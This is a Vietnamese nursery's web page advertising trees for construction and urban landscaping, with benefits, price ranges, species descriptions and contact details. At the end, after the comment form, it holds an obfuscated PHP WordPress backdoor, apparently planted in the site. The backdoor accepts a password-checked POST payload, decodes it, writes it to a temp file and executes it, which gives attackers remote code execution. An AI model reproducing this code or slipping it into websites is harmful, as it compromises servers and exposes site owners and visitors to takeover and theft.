Báo giá cây xanh công trình mới nhất 2021

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Báo giá cây xanh công trình – Các khu đô thị, các tòa nhà chọc trời hiện nay mọc lên như nấm khiến các yếu tố về môi trường ảnh hưởng rất nhiều. Để khắc phục tình trạng đó, các nhà đầu tư đã thực hiện trồng rất nhiều cây xanh trong công trình của mình để thanh lọc không khí. Cùng Vườn cây Hòa Bình tìm hiểu cây xanh công trình là gì và báo giá các loại cây xanh công trình thường được sử dụng hiện nay nhé. 

Cây xanh công trình là gì?

Cây xanh công trình là các loại cây trồng ở các khu đô thị, nhà máy, đường xá, khu vui chơi… nói chung là công trình với mục đích thanh lọc không khí và đem lại vẻ đẹp tươi mát cho không gian. 

Cây xanh công trình là gì?
Cây xanh công trình là gì?

>>> Xem thêm: Bán cây công trình giá rẻ – mua bán cây công trình giá rẻ Hà Nội

Lợi ích của cây xanh công trình

đặc điểm các loại cây xanh công trình này mà nó giúp ích rất nhiều cho việc bảo vệ môi trường hiện nay. Hãy điểm lại những lợi ích của việc trồng cây xanh công trình. 

Mang đến mỹ quan đẹp cho không gian

Với một không gian xung quanh là nhà cao tầng, các ngôi nhà mọc lên như nấm san sát nhau sẽ khiến cho người nhìn có cảm giác ngột ngạt, tù túng. Thêm vào đó, những không gian như vậy thu hút được rất ít người đến mua nhà và sinh sống. Vì vậy để tăng sự thu hút cho công trình của mình, có một cách rất đơn giản đó là trồng nhiều cây xanh trong không gian. 

Như vậy sẽ khiến không gian trở nên vô cùng khoáng đạt, trong lành đánh mạnh vào ý nghĩa của cây xanh đối với con người

Làm sạch môi trường

Với những nơi có quá nhiều những vật liệu xây dựng thì chất lượng không khí ở đó có thể sẽ không đảm bảo với cơ thể người. Vì vậy trồng cây xanh công trình để làm sạch môi trường là điều vô cùng cần thiết. 

Với các tác dụng chính như thanh lọc không khí, sản sinh ra khí oxy, tránh các loại khí gây ô nhiễm điều hòa và làm sạch môi trường thì cây xanh công trình được xem là thứ không thể thiếu trong các bản thiết kế của các nhà đầu tư. 

Lợi ích của cây xanh công trình
Lợi ích của cây xanh công trình

Bảo vệ công trình

Đối với việc thi công thì cây xanh cũng có tác dụng rất nhiều trong việc bảo vệ các công trình. Cây xanh giúp che mát, cản gió, bụi thậm chí là đảm bảo các vấn đề về an ninh. 

Với những công trình ở những địa điểm đặc thù như biển thì tác dụng của cây xanh công trình thể hiện rất tốt ở việc chắn gió, chắn bão. 

Đối với các công trình như các khu đô thị thì cây xanh có có tác dụng bảo đảm an ninh khá tốt cho người dân. 

Các tác dụng khác

Ngoài các tác dụng nói trên cây xanh còn có những chức năng khác như cải thiện tinh thần của con người,giảm căng thẳng mệt mỏi, làm bóng râm che mát và tăng độ ẩm trong không khí những ngày khô hanh tránh trường hợp tích điện. 

Ngoài ra các tác dụng khác về kinh tế như lấy gỗ, lấy nguyên liệu, chống xói mòn đất và làm gia tăng giá trị cho các công trình. 

>>> Xem thêm: Dịch vụ mua, bán cây trồng giá rẻ tại Hà Nội

Báo giá cây xanh công trình

Với những loại cây phổ biến thường được dùng ở các thành phố lớn thì sẽ có mức giá khá tương đương nhau nhưng với những loại khác thì sẽ dao động cao hoặc thấp hơn tùy theo từng loại. 

Báo giá cây xanh công trình
Báo giá cây xanh công trình

– Với các loại cây thông thường như: bàng đài loan, bằng lăng tím, vú sữa, lộc vừng các loại cây nhỏ đến cây lớn sẽ có giá từ 1tr7 đến 2tr5 đến 2tr8 1 cây. 

– Với các loại cây đặc biệt hơn như: sứ ngọc lan, kè bạc, lộc vừng có giá từ 4tr đến 9tr đồng một cây. 

>>> Xem thêm: Bán cây công trình

Các loại cây xanh công trình thường gặp

Cây chuông vàng

Đây là một loại cây thân gỗ nhỏ màu xám, có sọc trên thân. Lá của cây này bóng trơn tru, mọc thành chùm ở đầu cành, khi ra hoa có màu vàng hình vuông và nở vào tháng 3 hoặc tháng 5. 

Cây chuông vàng
Cây chuông vàng

Cây me tây

Là cây gỗ lớn, khi trưởng thành có thể cao từ 15 đến 50m. Thân cây mập, phân cành lá nhiều, tán lá rậm rạp. Điểm đặc biệt của cây me tây là là cây sẽ ngủ trước khi mặt trời lặn hoặc trước khi trời mưa. 

Cây kèn hồng

Loại cây thân gỗ, có chiều cao từ 3 đến 15m, đường kính 50cm. Lá của cây thuộc dạng lá kép chân vịt, cuống dài từ 3 đến 12cm. Hoa có hình dạng giống quả chuông màu hồng phấn và thường mọc thành chùm từ 5 đến 7 bông. 

Địa chỉ mua cây xanh công trình năm 2021

Cây công trình là điều không thể thiếu đối với mọi loại công trình từ đường xá đến khu đô thị. Nó vừa làm tăng giá trị thẩm mỹ của công trình, vừa tạo ra không gian sống xanh cho người dân.

Địa chỉ mua cây xanh công trình năm 2021
Địa chỉ mua cây xanh công trình năm 2021

Nếu bạn muốn mua cây công trình , hãy đến với Vườn cây Hòa Bình. Tại Vườn cây Hòa Bình, chúng tôi chuyên cung cấp các loại cây xanh công trình, cây phong thủy, cây nội thất, cây ngoại thất và cả giống cây ăn quả các loại.

>>> Xem thêm: Thông tin chi tiết về Vườn cây Hòa Bình

Các loại cây luôn sẵn sàng về số lượng và được chuẩn bị kỹ lưỡng trước khi giao đến khách hàng.

CÂY CÔNG TRÌNH GIÁ RẺ TẠI HÀ NỘI

Hotline: 0962.376.560

Địa chỉ: Tổ dân phố hoà bình 2, Biên giang , Hà Đông ,Hà Nội

Website https://vuoncayhoabinh.com/

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}